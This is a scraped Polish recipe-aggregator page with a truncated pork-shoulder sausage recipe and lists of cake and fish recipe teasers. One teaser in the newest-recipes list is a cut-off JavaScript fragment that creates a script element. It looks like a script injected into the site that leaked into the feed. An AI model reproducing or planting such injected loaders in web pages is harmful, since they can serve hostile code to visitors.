Kiełbasa z łopatki
Źródło: https://smakijackaw.blogspot.com/2019/05/kiebasa-z-opatki.html
SUROWIEC I ROZDRABNIANIE- lopatka 7 kg-podgardle 1 kg - 8 mm maszynka nr.8Po klasyfikacji uzyskalem :1 kl- 3,5 kg - krojona nozem na okolo 1,5-2 cm kostke2 kl-2 kg - 8 mm maszynka nr.83 kl- 1,5 kg -2,5 mm maszynka nr.8PRZYPRAWY I MATERIAŁY POMOCNICZE-peklosol 19 g/kg-pieprz czarny 3 g/kg-ziola prowansalskie 10 g do calosci-czosnek zgnieciony w prasce 5 g/kg-jelita wieprzowe-uzylem tez bialkowych ...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 6
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 6
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 18
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 18
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 19
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 15
20.12.2025 Magda Śledzie z grzybami i pieczoną papryką... ⇖ 20
Przepisy z bloga
SUROWIEC-400 g mięso z łopatki-300 g mięso drobiowe-300... ⇖ 234
SUROWIEC I ROZDRABNIANIEMielenie odbywało się na maszynce... ⇖ 194
SKŁADNIKI I PRZYPRAWY I MATERIAŁY POMOCNICZE-karkówka... ⇖ 1457
SUROWIECWP-boczek bez skóry 1 kg-pachwina bez skóry1... ⇖ 203
SUROWIEC I ROZDRABNIANIE-łopatka 2 kg/8 mm-pachwina 0,5... ⇖ 254
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-ćwiartki z... ⇖ 269
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-boczek ze... ⇖ 286
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-karkówka... ⇖ 464
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2681
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2096
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1440
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 838
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 674
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 643
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 641









































